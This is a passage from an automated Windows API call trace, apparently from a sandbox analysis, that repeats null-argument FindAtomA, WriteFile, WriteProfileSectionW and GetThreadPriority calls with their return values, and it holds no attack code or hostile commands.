lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.468] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.468] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.469] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.469] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.469] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.470] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.471] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.471] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.471] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.471] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.472] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.472] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.472] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.472] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.472] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.472] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.472] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.472] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.472] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.472] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.472] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.473] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.473] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.473] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.473] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.473] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.473] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.473] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.473] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.473] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.473] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.473] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.473] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.473] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.473] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.473] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.473] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.474] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.474] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.474] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.474] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.474] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.474] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.474] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.474] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.474] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.474] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.474] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.474] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.475] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.475] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.475] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.475] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.475] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.475] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.475] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.475] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.475] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.475] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.475] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.476] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.476] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.476] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.476] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.476] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.476] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.476] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.476] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.476] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.476] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.476] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.476] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.476] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.477] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.477] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.477] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.477] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.477] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.477] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.477] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.477] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.477] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.477] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.477] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.477] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.478] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.478] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.478] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.478] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.478] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.478] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.478] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.478] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.478] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.478] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.478] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.478] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.478] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.478] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.478] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.479] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.479] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.479] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.479] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.479] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.479] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.479] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.479] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.479] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.479] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.479] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.479] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.479] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.479] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.479] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.480] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.480] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.480] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.480] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.480] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.480] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.480] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.480] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.480] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.480] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.480] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.481] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.481] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.481] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.481] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.481] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.481] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.481] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.481] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.481] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.481] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.481] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.481] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.481] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.481] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.481] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.481] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.481] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.481] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.482] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.482] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.482] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.482] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.482] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.482] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.482] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.482] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.483] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.483] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.484] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.484] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.485] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.485] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.486] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.486] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.487] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.487] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.488] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.488] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.489] GetThreadPriority (hThread=0x0) returned 2147483647 